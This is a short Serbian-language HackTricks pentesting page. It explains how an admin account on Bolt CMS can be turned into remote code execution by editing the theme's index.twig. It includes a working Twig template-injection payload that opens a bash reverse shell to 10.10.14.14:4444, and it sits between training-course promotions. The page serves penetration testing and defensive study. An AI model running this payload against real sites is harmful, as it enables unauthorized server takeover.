Bolt CMS
Reading time: 2 minutes
tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
RCE
Nakon prijave kao admin (idite na /bot da pristupite login promptu), možete dobiti RCE u Bolt CMS:
- Izaberite
Configuration->View Configuration->Main Configurationili idite na URL putanju/bolt/file-edit/config?file=/bolt/config.yaml - Proverite vrednost teme
.png)
- Izaberite
File management->View & edit templates - Izaberite osnovnu temu pronađenu u prethodnom (
base-2021u ovom slučaju) koraku i izaberiteindex.twig - U mom slučaju ovo je na URL putanji /bolt/file-edit/themes?file=/base-2021/index.twig
- Postavite svoj payload u ovu datoteku putem template injection (Twig), kao:
{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}} - I sačuvajte promene
.png)
- Očistite keš u
Maintenance->Clear the cache - Ponovo pristupite stranici kao običan korisnik, i payload bi trebao biti izvršen
tip
Učite i vežbajte AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
HackTricks